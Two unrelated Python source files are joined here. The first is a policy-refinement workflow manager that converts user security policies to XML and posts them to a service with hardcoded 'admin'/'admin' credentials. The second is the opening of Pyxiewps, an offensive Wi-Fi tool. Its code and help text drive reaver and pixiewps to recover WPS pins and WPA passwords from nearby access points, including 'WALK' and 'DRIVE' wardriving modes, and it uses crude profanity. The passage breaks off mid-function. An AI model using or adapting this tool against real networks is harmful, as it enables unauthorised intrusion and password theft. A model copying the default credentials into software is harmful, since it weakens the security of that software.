if user_sg == None:
print "ERROR: No service graph produced"
raise AssertionError
data = {}
data['refinement_type'] = str(refinement_type)
data['hspl_mspl'] = str(hspl_xml)
print str(hspl_xml)
data['sPSA_SG'] = str(user_sg)
data['user_PSA'] = str(user_psa_xml)
data['market_PSA'] = str(psa_market_xml)
data['subject_string'] = str(subject_xml)
data['content_string'] = str(content_xml)
data['target_string'] = str(target_xml)
data['optimizationType_string'] = str(opt_profile_string)
data['maxEvaluationsNo_string'] = str(max_evals)
parent_json = {}
parent_json['input'] = data
json_data = json.dumps(parent_json)
# Perform sanitisation to keep the SPM happy
json_data = json_data.replace("\\n", "")
json_data = json_data.replace("\\r", "")
json_data = json_data.replace("\\t", "")
json_data = json_data.replace("\\/", "")
return json_data
# Takes JSON and returns as an XML
def convertToXML(data):
obj = json.loads(data)
xml = dicttoxml.dicttoxml(obj)
return xml
# This should only be used by users of type NORMAL
# Returns an XML string
def convertPSAlist_normal(self, userID, upr_url, psar_url):
xml = """<?xml version="1.0" encoding="UTF-8"?>
<tns:Mapping xmlns:tns="http://www.example.org/Refinement_Schema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.example.org/Refinement_Schema Refinement_Schema.xsd ">"""
psa_list = []
psar = psarClient.Client(str(psar_url))
upr = upr_client.UPRClient(str(upr_url))
r = upr.get_user_groups(userID)
data = r.json()
print "\n\n"
userGroups = r.json()
#self.dbprint("DEBUG: Here are the groups belonging to " + str(userID) + ": " + str(userGroups))
for g in userGroups:
print "Finding PSAs for group " + str(g)
r = upr.get_group_psa(g['group'])
if r.status_code != 200:
print "convertPSAlist: OH NO. When getting Group PSAs the UPR returned " + str(r.status_code)
else:
data = r.json()
print str(r.json())
for psa in data:
psa_list.append(str(psa['psa_id']))
# Debug function
print "Debug: Here are the PSAs of the group: "
for x in psa_list:
print " " + str(x) + " "
# The default for a normal user is to get the full PSAs from the PSA repository
# If the UPR group specifies a list of PSAs then that will override the following condition
if len(psa_list) == 0:
print "INFO: This normal user will have access to the full PSA catalogue"
r = psar.get_image_list(is_generic=False)
if r.status_code != 200:
print "ERROR convertPSAlist: OH NO. When getting PSAs, the PSAR returned " + str(r.status_code)
raise Exception('No PSAs could be found')
data = r.json()
for psa in data:
psa_list.append(str(psa['psa_id']))
print "INFO: There are " + str(len(psa_list)) + " PSAs in the PSAR"
xml += '<tns:psa_list>'
# Where "psa" is the PSA_ID
for psa in psa_list:
par = psar.get_psa_opt_par(psa)
par_data = psar.get_image_list(id=psa)
if par_data.status_code != 200:
print par_data.status_code
print "ERROR: No OPTIMISATION PROFILE FOUND FOR PSA: " + str(psa)
return
if len(par_data.json()) == 0:
print colored("ERROR: PSA not found: " + str(psa),'red')
return
par = par_data.json()[0] # PSA ID should be unique
latency = par['rating']
r = psar.get_psa_capabilities(psa)
if r.status_code == 200:
xml += '<tns:psa name="' + psa + '">'
xml += '<tns:PSA_info />'
xml += '<tns:PSA_characteristic cost="' + str(par['cost']) + '" latency="' + \
str(par['latency']) + '" rating="' + str(par['rating']) + '" />'
cap_list = r.json()['capabilities']
xml += '<tns:capability>'
for c in cap_list:
xml += '<tns:capability_list>' + c + '</tns:capability_list>'
xml += '</tns:capability>'
xml += '</tns:psa>'
else:
print colored(str(r.status_code) + " NO CAPABILITIES FOUND FOR PSA: " + str(psa), 'red')
xml += '</tns:psa_list></tns:Mapping>'
return xml
# This function concerns the SG definition and is used only
# for the expert and enthusiastic users; for the normal user
# we do not have an SG, only a list of PSAs (see convertPSAlist_normal).
# Result returns an XML...
# TODO: Rename this function to something more sensible
# New function developed by Fulvio Valenza
def convertSG(self, psa_list_json, mspl_psa_assoc, psar_url):
output = """<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<tns:Mapping xmlns:tns=\"http://www.example.org/Refinement_Schema\"
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:schemaLocation=\"http://www.example.org/Refinement_Schema\">
<tns:service_graph>"""
max_number = len(psa_list_json)
psar = psarClient.Client(str(psar_url))
i = 0
for psa in psa_list_json:
mspl_id = []
r = psar.get_image_list(id=psa['psa_id'])
if r.status_code != 200:
print "ERROR getting PSA information: HTTP " + str(r.status_code)
continue
try:
thejson = r.json()[0]
generic = thejson['is_generic']
psa_id = thejson['psa_id']
order = psa['running_order'] # TODO: need to use this as the serviceID
except IndexError:
print "ERROR!!!: This PSA does not exist: " + str(psa['psa_id'])
continue
if generic == True:
print "Generic"
output += "<tns:service serviceID=\"id" + str(i) + "\" "
for a in mspl_psa_assoc:
if a['psa_id'] == psa_id:
output += ' MSPL_ID="' + str(a['mspl']) + "\""
output += ">"
capability_list = psar.get_psa_capabilities(psa_id)
for c in capability_list.json()['capabilities']:
output += "<tns:capability>" + c + "</tns:capability>"
# End generic
else:
print "Not generic"
output += "<tns:service serviceID=\"id" + str(i) + "\"> "
output += "<tns:PSA name=\"" + str(psa_id) + "\">"
output += "<tns:PSA_info />"
opt_par_r = psar.get_psa_opt_par(psa_id)
if opt_par_r.status_code != 200:
raise Exception("ERROR: No optimisation profile for this PSA ID: " + str(psa_id))
opt_par = opt_par_r.json()
output += "<tns:PSA_characteristic cost=\"" + str(opt_par['cost']) + "\" latency=\" " \
+ str(opt_par['latency']) + "\" rating=\"" + str(opt_par['rating']) + "\"/>"
# Build the capability tags
output += "<tns:capability>"
capability_list = psar.get_psa_capabilities(psa_id)
for c in capability_list.json()['capabilities']:
output += "<tns:capability_list>" + c + "</tns:capability_list>"
output += "</tns:capability>"
for a in mspl_psa_assoc:
if a['psa_id'] == psa_id:
mspl_id.append(a['mspl'])
if len(mspl_id) > 0:
output += "<tns:MSPL_list>"
for mspl in mspl_id:
output += " <tns:mspl_list id=\"" + mspl + "\"/>"
output += "</tns:MSPL_list>"
output += "</tns:PSA>"
# End non-generic
output += "</tns:service>"
i = i + 1
output += " <tns:rootService>id0</tns:rootService>"
output += " <tns:endService>id" + str(max_number - 1) + "</tns:endService>"
i = 0
while (i < max_number - 1):
output += "<tns:edge>"
output += " <tns:src_Service>" + "id" + str(i) + "</tns:src_Service>"
output += " <tns:dst_Service>" + "id" + str(i + 1) + "</tns:dst_Service>"
output += " <tns:networkFields/>"
output += "</tns:edge>"
i = i + 1
if max_number == 1:
output += "<tns:edge>"
output += "<tns:src_Service>" + "id0</tns:src_Service>"
output += "<tns:dst_Service>" + "id0</tns:dst_Service>"
output += "<tns:networkFields/>"
output += "</tns:edge>"
output = output + " </tns:service_graph></tns:Mapping>"
print output
return output
def convert_GGUI_syntax_to_HSPL(self, hspljson):
"""
The GUI used to define policies currently has a limitation where
it does not produce proper well-formed XML according to the HSPL
schema. This function tries to sanitise the GUI representation and
produce a valid XML version.
"""
output = """<?xml version='1.0' encoding='UTF-8'?>
<tns:Mapping xmlns:tns='http://www.example.org/Refinement_Schema'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
xsi:schemaLocation=
'http://www.example.org/Refinement_Schema Refinement_Schema.xsd '>"""
output += "<tns:hspl_list>"
i = 0
while (i < len(hspljson)):
output += "<tns:hspl subject='" + str(hspljson[i]['target']) + "' id='hspl" + str(hspljson[i]['id']) + "'>"
pieces = str(hspljson[i]['hspl']).split(';')
action = pieces[1]
obj = pieces[2]
self.dbprint(obj)
# BEGIN HACKS
obj = obj.replace("Internet traffic", "Internet_traffic")
obj = obj.replace("intranet traffic", "Intranet_traffic")
action = action.replace("is/are authorized to access", "authorise_access")
action = action.replace("is/are not authorized to access", "no_authorise_access")
action = action.replace("reduce(s)", "reduce")
action = action.replace("remove(s)", "remove")
action = action.replace("protect(s) confidentiality", "prot_conf")
# END HACKS
output += "<tns:action>" + str(action) + "</tns:action>"
output += "<tns:objectH>" + str(obj) + "</tns:objectH>"
output += "<tns:fields"
time_list = []
url_list = []
target_list = []
content_list = []
purpose_list = []
resource_list = []
up_bandwidth_list = []
dl_bandwidth_list = []
country_list = []
if (len(pieces) > 3):
j = 3
while (j < len(pieces)):
print "Going through all the fields"
field = str(pieces[j])
field = field.translate(None, "()")
# self.dbprint( field
data = field.split(",")
k = 0
while k < (len(data) - 1):
if data[k] == "time_period":
time_list.append(data[k + 1])
elif data[k] == "specific_URL":
url_list.append(data[k + 1])
elif data[k] == "traffic_target":
target_list.append(data[k + 1])
elif data[k] == "type_Content":
content_list.append(data[k + 1])
elif data[k] == "purpose":
purpose_list.append(data[k + 1])
elif data[k] == "resource_values":
resource_list.append(data[k + 1])
elif data[k] == "uplink_bandwidth_value":
up_bandwidth_list.append(data[k + 1])
elif data[k] == "downlink_bandwidth_value":
dl_bandwidth_list.append(data[k + 1])
elif data[k] == "country":
country_list.append(data[k + 1])
else:
pass
k = k + 1
j = j + 1
if len(dl_bandwidth_list) > 0 or len(up_bandwidth_list) > 0:
output += " "
for v in dl_bandwidth_list:
output += " downlink_bandwidth_value="
output += "\"" + str(v) + "\""
for v in up_bandwidth_list:
output += " uplink_bandwidth_value="
output += "\"" + str(v) + "\""
if len(country_list) > 0:
for v in country_list:
output += " country='" + str(v) + "'"
output += ">"
if len(time_list) > 0:
output += "<tns:time_period time-zone='UTC'>"
for v in time_list:
output += "<tns:interval_time><tns:time_hours start-time='"
times = v.split("-")
firstTime = times[0]
secondTime = times[1]
output += str(firstTime) + ":00' end-time='"
output += str(secondTime) + ":00' />"
output += "</tns:interval_time>"
output += "</tns:time_period>"
if len(url_list) > 0:
output += "<tns:specific_URL>"
for v in url_list:
output += "<tns:URL>"
output += str(v)
output += "</tns:URL>"
output += "</tns:specific_URL>"
if len(target_list) > 0:
output += "<tns:traffic_target>"
for v in target_list:
output += "<tns:target_name>"
output += str(v)
output += "</tns:target_name>"
output += "</tns:traffic_target>"
if len(content_list) > 0:
output += "<tns:type_content>"
for v in content_list:
output += "<tns:content_name>"
output += str(v)
output += "</tns:content_name>"
output += "</tns:type_content>"
if len(purpose_list) > 0:
output += "<tns:purpose>"
for v in purpose_list:
output += "<tns:purpose_name>"
output += str(v)
output += "</tns:purpose_name>"
output += "</tns:purpose>"
if len(resource_list) > 0:
output += "<tns:resource_values>"
for v in resource_list:
output += "<tns:name_resurces>"
output += str(v)
output += "</tns:name_resurces>"
output += "</tns:resource_values>"
output += "</tns:fields>"
output += "</tns:hspl>"
i = i + 1
output += "</tns:hspl_list> </tns:Mapping>"
f = open("hspl.xml", "w")
f.write(output)
f.write("\n")
f.close()
print "Converted HSPL"
return output
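# Rough shape of the GUI input this method expects (illustrative sketch
# inferred from the parsing above; the values are placeholders):
#
#     hspljson = [
#         {
#             "id": 1,
#             "target": "alice",
#             "hspl": "alice;is/are not authorized to access;Internet traffic;(time_period,08-18)",
#         },
#     ]
#
# Each 'hspl' string is split on ';' into [subject, action, object, field, ...];
# the action/object strings are mapped onto schema keywords by the HACKS block,
# and every "(name,value)" group after the object becomes a tns:fields entry.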
# On failure, returns None
# On success, returns a tuple of the Application Graph in XML format + the list of MSPLs
def H2M(self, user, password, upr_url, spm_url, psar_url, editor_id=None):
# Delete old data
self.delete_ag(user, editor_id, password, upr_url)
print "Username is " + str(user) + ". Editor is " + str(editor_id)
upr = upr_client.UPRClient(str(upr_url))
cred = upr.auth_user(user, password)
if cred.status_code != 200:
self.dbprint("unauthorised")
else:
self.dbprint("successful authentication")
if editor_id == None:
editor_id = user
r = upr.get_user_list(user_id=user)
if r.status_code != 200:
self.dbprint("error getting user list")
else:
print "Username is " + user + " " + str(r.text)
data = r.json()
if data['creator'] != None:
self.dbprint("Creator: " + str(data['creator']))
# editor_id = data['creator']
else:
self.dbprint("User has no parent creator")
r = upr.get_user_type(user_id=user)
if r.status_code == 404:
self.dbprint("error getting user type")
else:
data = r.json()
usertype = data['type']
self.dbprint("User type: " + usertype)
# If normal user, delete all MSPLs
if usertype == "normal":
self.delete_all_mspl(user, password, upr_url, editor_id)
r = upr.get_user_opt_profile(user)
if r.status_code != 200:
self.dbprint("error could not find optimisation profile")
data = r.json()
opt_profile = data['optimization_profile']
self.dbprint("Optimisation profile: " + str(opt_profile))
# This is a hack, will clean later.
if True:
r = upr.get_user_list(user_id=user)
if r.status_code != 200:
raise Exception("UPR error code " + str(r.status_code))
data = r.json()
admin = data['is_admin']
if (admin == True):
print str(user) + " is an admin"
print "Getting created users"
r = upr.get_created_users(user)
if r.status_code == 200:
data = r.json()
users = data['users']
print str(user) + " has created " + str(len(users)) + " users"
# For every user that the admin has created...
token = ""
for child in users:
print "Running workflow manager for " + str(child)
print "Just about to run nested WFM...current user is " + str(user)
wfm = workflow_manager.WorkflowManager(child, token, upr_url, spm_url, psar_url)
else:
print colored(
"ERROR getting created users for " + str(user) + " with UPR status" + str(
r.status_code))
else:
print str(user) + " is NOT an admin"
if editor_id == None or editor_id == user:
editor_id = user
print str(user) + ": I AM MYSELF"
r = upr.get_hspl(target=user, editor=editor_id)
if r.status_code != 200:
self.dbprint("something went wrong when getting the HSPL: HTTP " + str(r.status_code))
else:
new = json.loads(json.dumps(r.json()))
self.dbprint(r.json())
if len(new) == 0:
print "No HSPLS"
if usertype != "expert":
self.dbprint(colored("ERROR: No HSPLs found for this user", 'red'))
return None
self.dbprint("Converting HSPL")
hspl_list_xml = self.convert_GGUI_syntax_to_HSPL(r.json())
self.dbprint(hspl_list_xml)
self.validate_hspl(hspl_list_xml)
market_psa_list_xml = self.get_market_psa_xml(user, psar_url)
print str(market_psa_list_xml)
r = upr.get_user_psa(user, is_active=True)
h2m_input = ""
subject_xml = self.get_subject_xml_file(upr_url)
f = open('xmlSchema/Target_Review.xml', 'r')
target_xml = f.read()
f.close()
f = open('xmlSchema/Content_Review.xml', 'r')
content_xml = f.read()
f.close()
user_sg = None
psa_xml = None
active_psa_list_xml = ""
# TODO: Below is for the expert user, call convertPSAlist for normal user
if usertype == "expert":
r = upr.get_user_mspl_psa(user)
mspl_psa_assoc = r.json()
r = upr.get_user_psa(user, is_active=True)
market_psa_list_json = r.json()
print "Converting SG for expert"
user_sg = self.convertSG(market_psa_list_json, mspl_psa_assoc, psar_url)
psa_xml = market_psa_list_json
else:
user_sg = self.convertPSAlist_normal(user, upr_url, psar_url)
psa_xml = user_sg
active_psa_list_xml = psa_xml
# Force this optimisation for all users
opt_profile = "MIN_BUY_COSTMAX_RATING"
# Decoded version for debugging
h2m_input = self.collectInput("POLICY_HSPL", hspl_list_xml, user_sg, market_psa_list_xml,
market_psa_list_xml, subject_xml, content_xml, target_xml,
opt_profile, "0")
f = open('h2m_input_decoded.json', 'w')
debug = f.write(h2m_input)
f.close()
# Base64 encoding # comment these to disable base64
hspl_list_xml = base64.b64encode(hspl_list_xml)
user_sg = base64.b64encode(user_sg) # Expert/enthusiastic user
psa_xml = base64.b64encode(str(psa_xml))
active_psa_list_xml = base64.b64encode(active_psa_list_xml)
market_psa_list_xml = base64.b64encode(market_psa_list_xml)
subject_xml = base64.b64encode(subject_xml)
content_xml = base64.b64encode(content_xml)
target_xml = base64.b64encode(target_xml)
if usertype == "normal":
h2m_input = self.collectInput("POLICY_HSPL", hspl_list_xml, user_sg, psa_xml,
market_psa_list_xml, subject_xml, content_xml, target_xml,
opt_profile, "0")
if usertype == "expert":
r = upr.get_mspl(target=str(user), editor=str(editor_id))
if r.status_code != 200:
print "ERROR: Could not retrieve MSPLs for expert user " + str(user) + " with error " + str(r.status_code)
return None
# At this point, the MSPLs should already be in base64 format?
mspl_list_xml = []
mspl_list_json = r.json()
concat_mspl = ""
print str(r.json())
howmany = json.loads(json.dumps(r.json()))
if len(howmany) == 0:
print "ERROR: No MSPLs available for th expert user: " + str(user)
return None
for mspl in mspl_list_json:
print "Getting MSPL policy..."
mspl_list_xml.append(mspl['mspl'])
concat_mspl = concat_mspl + base64.b64decode(mspl['mspl'])
print "Performing for expert..."
#print "\n\n"
#print str(concat_mspl)
#print "\n\n"
concat_mspl = base64.b64encode(concat_mspl)
h2m_input = self.collectInput("APPLICATION_MSPL_SG", concat_mspl, user_sg, market_psa_list_xml,
market_psa_list_xml, subject_xml, content_xml, target_xml,
opt_profile, "0")
print "Contacting the SPM H2M service"
f = open("h2m_input.json", "w")
f.write(h2m_input)
f.close()
headers = {'content-type': 'application/json'}
counter = 0
print "Calling H2M"
while counter < 3:
try:
r = requests.post("http://" + spm_url + \
":8181/restconf/operations/h2mservice:h2mrefinement",
auth=('admin', 'admin'), headers=headers,
data=h2m_input, timeout=None)
break
except Exception:
counter = counter + 1
if counter < 3:
continue
self.dbprint("Connection to server timed out...")
sleep(1)
self.dbprint("Retrying...")
return None
self.dbprint(r.status_code)
print "SPM replied with " + str(r.status_code)
if r.status_code == 200:
data = r.json()
application_graph = base64.b64decode(data['output']['application_graph'])
try:
problem = data['output']['remediation']
self.dbprint("Policies need reconciliation")
self.dbprint("SPM returned " + str(r.json()))
is_reconciled = False
b64_mspl_list = []
ag = ""
# If policies are not enforceable, abort and back away very slowly...
try:
b64mspl_list = data['output']['MSPL']
ag = data['output']['application_graph']
except KeyError:
print colored("POLICY NOT ENFORCEABLE", 'red')
return None
self.dbprint("There are " + str(len(b64mspl_list)) + " MSPLs")
for mspl in b64mspl_list:
capability = self.get_capability_from_mspl(base64.b64decode(mspl))
print "CAPABILITY IS " + str(capability)
r = upr.create_mspl(user, editor_id, capability, is_reconciled, mspl)
print "Uploading unreconciled MSPLs"
if r.status_code != 201:
self.dbprint(" Error storing MSPL set in UPR with error code " + \
str(r.status_code))
else:
self.dbprint(" Successfully stored MSPL set in UPR")
self.dbprint(" Policies of " + str(user) + " still require reconciliaton")
r = upr.post_ag(user, editor_id, ag)
if r.status_code != 201:
print colored("UPR returned error code when storing AG: " + str(r.status_code), 'red')
else:
print colored("Successfully stored user AG in UPR", 'green')
'''
# TODO: Need to store MSPL-PSA associations
# psa_id = get_psa_assoc(mspl)
if (psa_id != None):
# TODO: FINISH T HIS BIT
#r = post_mspl_psa_assoc()
if r.status_code != 201:
print "COULD NOT CREATE USER-MSPL-PSA assoc!!!!!"
else:
self.dbprint(" Stored user-mspl-psa association")
'''
return None
except KeyError:
pass
b64mspl_list = data['output']['MSPL']
ag = data['output']['application_graph']
# Store resulting MSPL set and AG in the UPR
self.dbprint("There are " + str(len(b64mspl_list)) + " MSPLs")
mspl_list = []
for mspl in b64mspl_list:
raw_mspl = base64.b64decode(mspl)
mspl_list.append(raw_mspl)
# Store MSPL in UPR.
# TODO: store capability in capability field for expert users
is_reconciled = False
capability = self.get_capability_from_mspl(base64.b64decode(mspl))
r = upr.create_mspl(user, editor_id, capability, is_reconciled, mspl)
if r.status_code != 201:
self.dbprint(" Error creating MSPL with code " + str(r.status_code))
else:
self.dbprint(
colored(" Successfully stored MSPL in UPR: response " + str(r.status_code),
'green'))
r = upr.post_ag(user, editor_id, ag)
if r.status_code != 201:
print colored("UPR returned error code when storing AG: " + str(r.status_code), 'red')
else:
print colored("Successfully stored user AG in UPR", 'green')
# TODO: perhaps need to store each MSPL in the UPR
return (application_graph, mspl_list, editor_id)
else:
print("Error in H2M service response: " + str(r.text))
self.dbprint("\nIf you see the above, copy and paste to Fulvio Valenza and Marco")
return None
else:
self.dbprint("ERROR: unsupported user")
return None
def delete_ag(self, user, editor_id, password, upr_url):
upr = upr_client.UPRClient(str(upr_url))
r = upr.delete_user_ag(user, editor_id)
print "Deleting AG from UPR...status code " + str(r.status_code)
return r
def delete_all_mspl(self, user, password, upr_url, editor_id):
upr = upr_client.UPRClient(str(upr_url))
if (editor_id == None):
r = upr.get_mspl(target=user, editor=user)
else:
r = upr.get_mspl(target=user, editor=editor_id)
if r.status_code != 200:
raise Exception("WFM could not delete MSPL policies from the UPR " + str(r.status_code))
data = r.json()
for mspl in data:
try:
mspl_id = mspl['mspl_id']
r = upr.delete_mspl(mspl_id)
if r.status_code != 204:
print colored("Could not delete MSPL??? ERROR code from UPR: " + str(r.status_code), 'red')
except KeyError:
print "No MSPL ID? Show the following to Adrian: " + str(r.json())
def __init__(self, user, password, upr_url, spm_url, psar_url, set_debug=False, editor_id=None):
self.dbprint("Contacting UPR")
if editor_id == None:
upr = upr_client.UPRClient(str(upr_url))
r = upr.get_user_creator(user)
if r.status_code == 200:
data = r.json()
creator = data['creator']
if creator != None:
wfm = workflow_manager.WorkflowManager(user, password, upr_url, spm_url, psar_url,
editor_id=creator)
if set_debug == True:
self.DEBUG = True
mspl_list_xml = None
mspl_list_xml = WorkflowManager.H2M(self, user, password, upr_url, spm_url, psar_url, editor_id)
#print "Fatal error during workflow manager"
if (mspl_list_xml) is None:
self.dbprint("ERROR: This is the end. My only friend, the end.")
return None
else:
if (len(mspl_list_xml) > 1):
self.dbprint("H2M Workflow finished")
else:
self.dbprint("ERROR: No application graph?")
return None
# Checks to see if the HSPL is valid according to the SECURED HSPL schema
def validate_hspl(self, hspl_list_xml):
"""
:param hspl_list_xml: The XML of HSPLs
"""
try:
xsd_file = 'xmlSchema/hspl.xsd'
schema = etree.XMLSchema(file=xsd_file)
parser = objectify.makeparser(schema=schema)
objectify.fromstring(hspl_list_xml, parser)
self.dbprint(("YEAH!, my xml file has validated"))
except XMLSyntaxError:
self.dbprint("Oh NO!, the GUI HSPL does not validate")
self.dbprint(
"""To debug, use: xmllint --format --pretty 1 --load-trace --debug --schema hspl.xsd hspl.xml""")
self.dbprint(
"\nIt might still work with the SPM. But beware, there be dragons. Bad things may happen!")
def main(argv):
args = argv
debug = None
for a in args:
if a == "--debug":
debug = True
args.remove('--debug')
if len(args) != 6:
print("Usage: workflow-manager.py <username> <password> <upr_address> <spm_address> <psar_url>")
print("Optional flags:\n --debug : Shows more detailed output")
print("\nMy job is turn HSPL into LSPL, just like water into wine")
else:
script, user, password, upr_url, spm_url, psar_url = args
print "Starting"
wfm = workflow_manager.WorkflowManager(user, password, upr_url, spm_url, psar_url, set_debug=debug)
if __name__ == '__main__':
main(argv)
|
|
from os import kill, system, path, chdir
from signal import alarm, signal, SIGALRM, SIGKILL
import time
import subprocess
from re import sub, compile, search
from sys import argv
import datetime
import urllib
REAVER = 'reaver'
PIXIEWPS = 'pixiewps'
AIRMON = 'airmon-ng'
GIT = 'git'
INFO = '\033[32m[+] \033[0m' # green
ALERT = '\033[31m[!] \033[0m' # red
INPUT = '\033[34m[>] \033[0m' # blue
DATA = '\033[33m[DATA] \033[0m' #yellow
OPTION = '\033[33m[!!!] \033[0m' #yellow
SEPARATOR = '*'*70+'\n'
USE_PIXIEWPS = False # Tries to get the WPS pin with pixiewps
AIRODUMP_TIME = 3 # Airodump spends this amount of time enumerating APs
RSSI = -100 # RSSI
CHANNEL = '' # All
REAVER_TIME = 6 # Time to get all the useful AP information with reaver
CHOICES_YES = ['Y', 'y', '', 'yes', 'YES', 'Yeah.. whatever...']
CHOICES_NOPE = ['N', 'n', 'no', 'No', 'Dude... I mean... NO! GTFO!'] # Tits or GTFO
blacklist = [] # BSSID blacklist of failed attacks
PROMPT_APS = False
OUTPUT = False
OUTPUT_FILE = 'data.txt'
PRINT_REAVER = True
PRINT_PIXIE = True
GET_PASSWORD = False
FOREVER = False
OVERRIDE = True
BLACKLIST = True
MAX_APS = 'All'
USE_MODES = False
def banner():
"""
Prints the banner into the screen
"""
print
print "\t ____ _ "
print "\t| _ \ _ ___ _(_) _____ ___ __ ___ "
print "\t| |_) | | | \ \/ / |/ _ \ \ /\ / / '_ \/ __|"
print "\t| __/| |_| |> <| | __/\ V V /| |_) \__ \\"
print "\t|_| \__, /_/\_\_|\___| \_/\_/ | .__/|___\\"
print "\t |___/ |_| "
print
print "\tPyxiewps v1.2 by jgilhutton <[email protected]>"
print "\tReaver 1.5.2 mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg"
print "\t Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>"
print "\tPixiewps Copyright (c) 2015, wiire <[email protected]>"
print "\tAircrack www.aircrack-ng.org"
print
def arg_parser():
"""
Parses the arguments and calls the help() function if any problem is found
"""
global PRINT_PIXIE
global PRINT_REAVER
global USE_PIXIEWPS
global AIRODUMP_TIME
global REAVER_TIME
global CHANNEL
global PROMPT_APS
global OUTPUT_FILE
global OUTPUT
global GET_PASSWORD
global FOREVER
global OVERRIDE
global BLACKLIST
global RSSI
global MAX_APS
global USE_MODES
H = ['-h','--help']
flags = ['-p','-P','-f','-q','-F','-A']
binary_flags = ['-a','-t','-c','-o','-s','-m','-M',
'--max-aps','--rssi','--airodump-time','--time','--channel','--output','--mode']
for arg in argv[1:]:
if arg in H:
help()
exit()
elif argv[argv.index(arg)-1] in binary_flags:
continue
elif arg == '-m' or arg == '--mode':
USE_MODES = True
mode = argv[argv.index(arg)+1]
if mode == 'WALK':
USE_PIXIEWPS = True
AIRODUMP_TIME = 4
REAVER_TIME = 8
GET_PASSWORD = True
FOREVER = True
MAX_APS = 2
elif mode == 'DRIVE':
USE_PIXIEWPS = True
REAVER_TIME = 10
FOREVER = True
MAX_APS = 1
elif mode == 'STATIC':
USE_PIXIEWPS = True
AIRODUMP_TIME = 5
REAVER_TIME = 10
GET_PASSWORD = True
PROMPT_APS = True
OVERRIDE = False
else:
print ALERT + "WTF does %s mean?" %mode
print " Check available modes in the help."
print " But I know you are a lazy fuck, so here's the help for you..."
help()
elif arg == '-M' or arg == '--max-aps':
try:
MAX_APS = int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-s' or arg == '--rssi':
try:
RSSI = int(argv[argv.index(arg)+1])
if RSSI < -100 or RSSI > 0: help()
except ValueError:
help()
elif arg == '-q' or arg == '--quiet':
PRINT_PIXIE = False
PRINT_REAVER = False
elif arg == '-p' or arg == '--use-pixie':
USE_PIXIEWPS = True
elif arg == '-a' or arg == '--airodump-time':
try:
AIRODUMP_TIME = int(argv[argv.index(arg)+1])
if AIRODUMP_TIME <= 0: help()
except ValueError:
help()
elif arg == '-t' or arg == '--time':
try:
REAVER_TIME = int(argv[argv.index(arg)+1])
if REAVER_TIME <= 0: help()
except ValueError:
help()
elif arg == '-c' or arg == '--channel':
try:
CHANNEL = int(argv[argv.index(arg)+1])
if CHANNEL <= 0 or CHANNEL >= 15: help()
except ValueError:
help()
elif arg == '-P' or arg == '--prompt':
PROMPT_APS = True
elif arg == '-o' or arg == '--output':
OUTPUT = True
try:
m = argv[argv.index(arg)+1]
if m not in flags:
if m not in binary_flags: OUTPUT_FILE = m
except IndexError:
pass
elif arg == '-f' or arg == '--pass':
GET_PASSWORD = True
elif arg == '-F' or arg == '--forever':
FOREVER = True
elif arg == '-A' or arg == '--again':
OVERRIDE = False
BLACKLIST = False
else:
help()
if CHANNEL != '':
AIRODUMP_TIME = 1
def help():
"""
Help information
"""
print
print ' Examples:'
print
print "\tpyxiewps -p -t 6 -c 7 -P -o file.txt -f"
print "\tpyxiewps --use-pixie --time 6 --channel 7 --prompt --output file.txt"
print "\tpyxiewps -m STATIC"
print "\tpyxiewps --mode DRIVE"
print
print ' Individual options:'
print
print '\t-p --use-pixie Once all the data is captured with reaver [False]'
print '\t the script tries to get the WPS pin with pixiewps.'
print '\t-a --airodump-time [time] Airodump spends this amount of time enumerating APs [3]'
print '\t-t --time [time] Set the time used to get the hex data from the AP. [6]'
print '\t-c --channel [channel] Set the listening channel to enumerate the WPS-active APs.'
print '\t If not set, all channels are scanned.'
print '\t-P --prompt If more than one WPS-active AP is found, ask the user [False]'
print '\t the target to attack.'
print '\t-o --output [file] Outputs all the data into a file.'
print '\t-f --pass If the WPS pin is found, the script uses reaver again to retrieve'
print '\t the WPA password of the AP.'
print '\t-q --quiet Doesn\'t print the AP information. Will print the WPS pin and pass if found.'
print '\t-F --forever Runs the program in a while loop so the user can scan and attack a whole'
print '\t zone without having to execute the program over and over again.'
print '\t-A --again Target is attacked again in case of success without prompting the user.'
print '\t-s --signal [-NUMBER] APs with RSSI lower than NUMBER will be ignored [-100]'
print '\t A value of "-50" will ignore APs with RSSI between'
print '\t -100 and -51 and will attack APs which RSSI goes from -50 to 0'
print '\t-M --max-aps [number] Max amount of APs to be attacked.'
print '\t-m --mode [mode] Set the mode preset. Any preset option can be overridden'
print '\t by giving its argument and value on the command line.'
print '\t i.e: "-m DRIVE -t 10"'
print
print ' Available modes:'
print
print '\tWALK:'
print '\t\t[-p] [-f] [-a 4] [-t 8] [-F] [-M 2]'
print '\t\tTries to get the WPS pin'
print '\t\t4 seconds will be used to enumerate the APs'
print '\t\t8 seconds will be used to fetch the AP information'
print '\t\tWill try to get the password'
print '\t\tThe program will run in a while loop.'
print '\t\tA max amount of 2 APs will be attacked'
print '\t\tAP won\'t be attacked again if failed once'
print '\tDRIVE:'
print '\t\t[-p] [-t 10] [-F] [-M 1]'
print '\t\tTries to get the WPS pin'
print '\t\t3 seconds will be used to enumerate the APs'
print '\t\t10 seconds will be used to fetch the AP information'
print '\t\tWon\'t try to get the password'
print '\t\tThe program will run in a while loop.'
print '\t\tOnly one AP will be attacked'
print '\t\tAP won\'t be attacked again if failed once'
print '\tSTATIC:'
print '\t\t[-p] [-f] [-a 5] [-t 10] [-P] [-O]'
print '\t\tTries to get the WPS pin'
print '\t\t5 seconds will be used to enumerate the APs'
print '\t\t10 seconds will be used to fetch the AP information'
print '\t\tWill try to get the password'
print '\t\tThe program will run only once'
print '\t\tUser will be prompted for an AP to attack'
print '\t\tAP will be attacked again if failed once'
exit()
class Engine():
"""
Manage the Config functions and start the program
"""
def __init__(self):
self.REAVER = True
self.PIXIEWPS = True
self.AIRMON = True
self.GIT = True
def start(self):
"""
Main function
"""
chdir('/root/')
if not c.check_iface(): # check_iface returns True if any previous wlan is found in monitor mode
c.set_iface("UP")
else:
print INFO + "Previous interface was found in NSA mode: %s" %c.IFACE_MON
choice = raw_input("%sDo you wish to use this interface? [Y/n] " %INPUT)
print
if choice in CHOICES_YES:
